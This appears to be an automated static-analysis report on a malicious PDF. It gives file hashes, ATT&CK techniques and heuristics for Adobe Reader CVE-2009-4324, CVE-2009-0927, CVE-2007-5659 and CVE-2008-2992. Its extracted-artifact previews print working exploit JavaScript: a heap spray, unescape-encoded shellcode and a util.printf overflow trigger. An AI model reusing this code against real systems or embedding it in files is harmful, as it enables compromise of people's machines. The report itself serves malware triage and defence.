Malicious PDF — malware analysis report

Static analysis result for SHA-256 776c52be5bafd299…

MALICIOUS

PDF

118.5 KB
MD5: 6f048340fbca531f92a3f7ca754eb8dd SHA-1: e95d6c90d6e38544c508954dc51273293016a555 SHA-256: 776c52be5bafd299395f33d0ea884be1f449f2084aeb9c640092186208540060
616 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains obfuscated JavaScript that exploits multiple known vulnerabilities in Adobe Reader, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. This JavaScript is designed to download and execute a second-stage payload, as indicated by the 'PDF_JS_EXPLOIT_CLUSTER' and 'PDF_ADOBE_READER_MULTI_CVE_JS_KIT' heuristic firings. The specific vulnerabilities targeted are explicitly mentioned in the heuristic details.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 12

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.Agent-36086 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Large comment-padded JavaScript eval stager high PDF_JS_LARGE_COMMENT_PADDED_EVAL
    PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js
bed77171e472ddb92c7a53edb58514ddf49bc2706487f4bd1c4366cec5b4df46		 pdf-javascript-stream PDF /JS object 6 at offset 0x143 625845 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 42 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function clR(gY2){ /*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
... (truncated)
legacy_pdfkit_stage_000.js
961ac2507b0594f329723ef4109c36d5c083ebf67a301ec653ff7cd83667e1ac		 deobfuscated-js comment-padded substitution-hex decoded JavaScript at offset 0x143 10413 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len)
{
	while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
	var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uE3FF%u470B%u8710%u77AA%uE310%uCC0B%uEF50%u3780%u4E0C%u3780%u6218%u47CF%u1CE7%uCCF4%u58FC%u4743%uE310%u4761%u6D78%u4945%u8BFC%uB993%uED9A%uA863%u03DE%u2F6B%u2923%u1C81%uDB78%uEB29%u8BF7%u0EE1%u0B9A%u9C63%uC09A%u2FE2%uAF4B%u9A11%u0F78%u449C%u0B1C%u4614%uE310%u4382%u603B%u43E0%u231B%uB67E%u8D78%u336E%u8B10%u2E7C%u8A7E%uB85F%uCB45%u1E52%u231B%uC304%uE3E8%u470B%u139B%u1FB0%uE310%u2D0B%u8B10%u0322%uB4F8%u0E63%uECFD%u2F75%uA89B%u18E8%u03F8%u470B%u6A10%u6C0F%u0893%u4C0F%u96D0%uCAFA%uE395%u4709%uB310%uB863%uE310%uB80B%uD745%uC286%uE710%u470B%u8940%u2D0B%u6E10%u478E%uE312%u170B%uB6EF%uCA33%uE3A5%u470F%u4F10%u8701%u1865%u8045%uCD16%u3F6E%u2475%u434D%uE310%u470B%u669D%u430B%uE310%u8E38%uB341%u12F4%uA32C%uC304%uE390%u470B%u6A58%u0B4E%uE378%u474B%u8910%uB84B%uAB45%u8700%u8D64%u0282%u8970%u2D0B%u8910%u2D0B%u8910%uB80B%uB345%u8700%uB964%u4761%uE378%u470B%u8914%u2D0B%u0A10%u47A1%uE310%uB85B%uB745%u8700%uA164%u0282%u6E78%u234E%u8B40%u070B%uE310%u32F4%u1C70%u2F7E%uB6EF%u4C53%u97D0%uCC1E%u8755%u8700%uED64%u32F4%u1C74%u277E%u96EF%uB847%uA345%u92E0%u96EF%uB847%uA745%u8E20%uB251%uC286%uE710%u470B%u1C40%u6B5E%u1C7A%u12F4%uB620%uAB80%u9E9B%u4C03%u97EF%u1440%u3D9B%uCC5D%uDF63%u3380%u9B23%uB408%u6846%u677D%u1013%u8E38%uA259%u44A6%uB5D3%uB138%u5D1F%u7F1B%u97C6%u8603%uEEDE%uB508%u0850%u7CFA%uBDEE%uA27E%u684A%uCCE0%uC74A%u9A08%u6876%u0C07%uB99B%u4417%u68CD%uCC0F%u2613%u1C55%uE1FB%u8738%u214D%u470F%uB2F8%uB8F4%u8BEF%u337F%uD960%u6824%u9071%u2662%u937E%u3564%u977E%u2E79%uCD60%u2868%uCC7D%u357F%u8771%u686E%u802F%u7636%u9036%u2362%u852D%u7632%u8728%u216F%uDA22%u253D%uD726%u2332%u8073%u223E%u8524%u2532%uD772%u7338%u8229%u223A%uC526%u7A78%uE323%u470B%u0010");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;
	while(bigblock.length<spray){bigblock+=bigblock;}
	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);
	while(block.length+spray<0x40000){block=block+block+fillblock;}
	var mem_array=new Array();
	for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}
	
function collab_email()
{
	var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uE3FF%u470B%u8710%u77AA%uE310%uCC0B%uEF50%u3780%u4E0C%u3780%u6218%u47CF%u1CE7%uCCF4%u58FC%u4743%uE310%u4761%u6D78%u4945%u8BFC%uB993%uED9A%uA863%u03DE%u2F6B%u2923%u1C81%uDB78%uEB29%u8BF7%u0EE1%u0B9A%u9C63%uC09A%u2FE2%uAF4B%u9A11%u0F78%u449C%u0B1C%u4614%uE310%u4382%u603B%u43E0%u231B%uB67E%u8D78%u336E%u8B10%u2E7C%u8A7E%uB85F%uCB45%u1E52%u231B%uC304%uE3E8%u470B%u139B%u1FB0%uE310%u2D0B%u8B10%u0322%uB4F8%u0E63%uECFD%u2F75%uA89B%u18E8%u03F8%u470B%u6A10%u6C0F%u0893%u4C0F%u96D0%uCAFA%uE395%u4709%uB310%uB863%uE310%uB80B%uD745%uC286%uE710%u470B%u8940%u2D0B%u6E10%u478E%uE312%u170B%uB6EF%uCA33%uE3A5%u470F%u4F10%u8701%u1865%u8045%uCD16%u3F6E%u2475%u434D%uE310%u470B%u669D%u430B%uE310%u8E38%uB341%u12F4%uA32C%uC304%uE390%u470B%u6A58%u0B4E%uE378%u474B%u8910%uB84B%uAB45%u8700%u8D64%u0282%u8970%u2D0B%u8910%u2D0B%u8910%uB80B%uB345%u8700%uB964%u4761%uE378%u470B%u8914%u2D0B%u0A10%u47A1%uE310%uB85B%uB745%u8700%uA164%u0282%u6E78%u234E%u8B40%u070B%uE310%u32F4%u1C70%u2F7E%uB6EF%u4C53%u97D0%uCC1E%u8755%u8700%uED64%u32F4%u1C74%u277E%u96EF%uB847%uA345%u92E0%u96EF%uB847%uA745%u8E20%uB251%uC286%uE710%u470B%u1C40%u6B5E%u1C7A%u12F4%uB620%uAB80%u9E9B%u4C03%u97EF
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.